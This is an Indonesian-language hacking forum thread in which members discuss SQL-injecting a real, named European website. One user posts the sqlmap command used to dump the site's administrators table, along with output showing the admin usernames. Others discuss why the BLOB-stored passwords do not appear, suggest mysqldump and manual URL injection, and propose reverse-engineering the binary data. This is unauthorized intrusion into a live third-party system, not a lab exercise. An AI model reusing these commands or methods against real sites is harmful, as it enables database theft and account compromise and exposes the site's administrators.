Posts: 929
Threads: 141
Joined: Jul 2011
assalamualaikum
maaf oot,dari hasil diskusi tadi menemui kebuntuan
saya dapat target http://www.ewcdb.eu/show_news.php?news_ID=2076 --> buat belajar
terus saya cari database,kolom,tablesnya jga,tp pas mau dump pass nya tidak keluar
kata om XXX(nama disamarkan  ) itu pake binari bukan hash
for test--> python sqlmap.py -u http://www.ewcdb.eu/show_news.php?news_ID=2076 -D ECDB -T administrators -C admin_login,admin_passwd --dump
hasilnya
+-------------+--------------+
| admin_login | admin_passwd |
+-------------+--------------+
| Anders | |
| Elwin | |
| ipas | |
| mkelemen | |
| mstollt | |
| nkluge | |
+-------------+--------------+
terus cara dump nya gmna yah??
mohon bantuannya
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
Posts: 2,063
Threads: 95
Joined: Jun 2011
(05-26-2012, 01:06 AM)wine trochanter Wrote: assalamualaikum
maaf oot,dari hasil diskusi tadi menemui kebuntuan
saya dapat target http://www.ewcdb.eu/show_news.php?news_ID=2076 --> buat belajar
terus saya cari database,kolom,tablesnya jga,tp pas mau dump pass nya tidak keluar
kata om XXX(nama disamarkan ) itu pake binari bukan hash
for test--> python sqlmap.py -u http://www.ewcdb.eu/show_news.php?news_ID=2076 -D ECDB -T administrators -C admin_login,admin_passwd --dump
hasilnya
+-------------+--------------+
| admin_login | admin_passwd |
+-------------+--------------+
| Anders | |
| Elwin | |
| ipas | |
| mkelemen | |
| mstollt | |
| nkluge | |
+-------------+--------------+
terus cara dump nya gmna yah??
mohon bantuannya
http://www.ewcdb.eu/show_news.php?news_ID=2076 -D ECDB -T administrators -C admin_login,admin_passwd --dump <=== perhatikan ini. ketika om jalanin ini om udah dumping database ECDB untuk tabel administrator saja,,kalau mau dumping 1 db bisa kok kalau mau tunggu berjam2 wwkwk,, dan catatan untuk web ini om g akan bisa temukan passnya wwkw,,type data passna blob,,sureeem,,
Posts: 929
Threads: 141
Joined: Jul 2011
(05-26-2012, 06:36 AM)junior.riau18 Wrote: (05-26-2012, 01:06 AM)wine trochanter Wrote: assalamualaikum
maaf oot,dari hasil diskusi tadi menemui kebuntuan
saya dapat target http://www.ewcdb.eu/show_news.php?news_ID=2076 --> buat belajar
terus saya cari database,kolom,tablesnya jga,tp pas mau dump pass nya tidak keluar
kata om XXX(nama disamarkan ) itu pake binari bukan hash
for test--> python sqlmap.py -u http://www.ewcdb.eu/show_news.php?news_ID=2076 -D ECDB -T administrators -C admin_login,admin_passwd --dump
hasilnya
+-------------+--------------+
| admin_login | admin_passwd |
+-------------+--------------+
| Anders | |
| Elwin | |
| ipas | |
| mkelemen | |
| mstollt | |
| nkluge | |
+-------------+--------------+
terus cara dump nya gmna yah??
mohon bantuannya
http://www.ewcdb.eu/show_news.php?news_ID=2076 -D ECDB -T administrators -C admin_login,admin_passwd --dump <=== perhatikan ini. ketika om jalanin ini om udah dumping database ECDB untuk tabel administrator saja,,kalau mau dumping 1 db bisa kok kalau mau tunggu berjam2 wwkwk,, dan catatan untuk web ini om g akan bisa temukan passnya wwkw,,type data passna blob,,sureeem,,
iya cara itu dah saya coba kok,tp gak tampil2 tu pass
pass siluman kali yah
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
Posts: 2,544
Threads: 56
Joined: Jun 2011
salah satu cara yang bisa dilakukan adalah melalui akses ke mysqlnya untuk melakukan dump file blob:
Code: mysqldump --opt -u user -p pass dbname images_table > images.sql
blob adalah file biner yang akan berbentuk seperti ini:
Quote: '╖?*á±dÆ╦N╪Æ·h^ye"π╩i╪ Z+-$▼₧╬Y.∞┌|↕╘l∞/l╞⌂î7æ▌X█XE.ºΓ[ ;╦ï♣éµ♂º╜┤║].♂┐φ9dë╟█'╕ÿG∟═0à¡úè♦╥↑ù♣♦¥'╔NÑ'
file blob berupa file biner multimedia yang bisa dicoba2 dibuka dengan imageviewer atau vlc
klo menyimpan password biasanya mereka menyimpan dalam bentuk image, trial n error aja
untuk melakukan dump seperti diatas menggunakan sqlmap ada yang tahu caranya? atau ada teknik lain yang bisa dilakukan untuk mendapatkan file blob?
Posts: 2,063
Threads: 95
Joined: Jun 2011
om ikons,,itu udh lama ane test,,dan memang susah,, terus ane coba mnta pendapat om zee, dan om zee coba saran manual injection(url),, yap memang berhasil tapi g seluruh karatker terbaca,,ada beberapa karakter yang mmasih dalam contoh file binner diatas yang om sebutkan jadi hasil dump nya waktu itu kira2 seperti ini
dan ane sudah coba2 ganti tetep g cocok wkwkwk\
padahal itu web gede
Posts: 2,544
Threads: 56
Joined: Jun 2011
klo dump dalam bentuk biner aja bisa ga? nanti kan bisa dicoba2 file binernya, kita reverse engineer bareng2
Posts: 2,063
Threads: 95
Joined: Jun 2011
mysqldump --opt -u user -p pass dbname images_table > images.sql <== gini caranya??
kalau dalam perintah sqlmap lengkap kek gini?
./sqlmap.py -u www.target.com -D databasename -T administrator -C user,passowrd --dump kelanjutannya apa om?
Posts: 929
Threads: 141
Joined: Jul 2011
hemm sama dah,saya jg blm ketemu caranya,masih lg nyari referensi
kalo kataom junior,saya udah pake cara itu tp hasilnya sama dah
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
Posts: 2,544
Threads: 56
Joined: Jun 2011
(05-26-2012, 08:34 PM)junior.riau18 Wrote: mysqldump --opt -u user -p pass dbname images_table > images.sql <== gini caranya??
kalau dalam perintah sqlmap lengkap kek gini?
./sqlmap.py -u www.target.com -D databasename -T administrator -C user,passowrd --dump kelanjutannya apa om?
nah itu dia ane sendiri ga tau klo utk sqlmap buat dump blob seperti yg ada di mysqldump
Posts: 836
Threads: 25
Joined: Nov 2011
nyimak pening ni ngebacanya wkwkwk :p
Every Second, Every Minutes, Every Hours, Every Days Its Never End
|
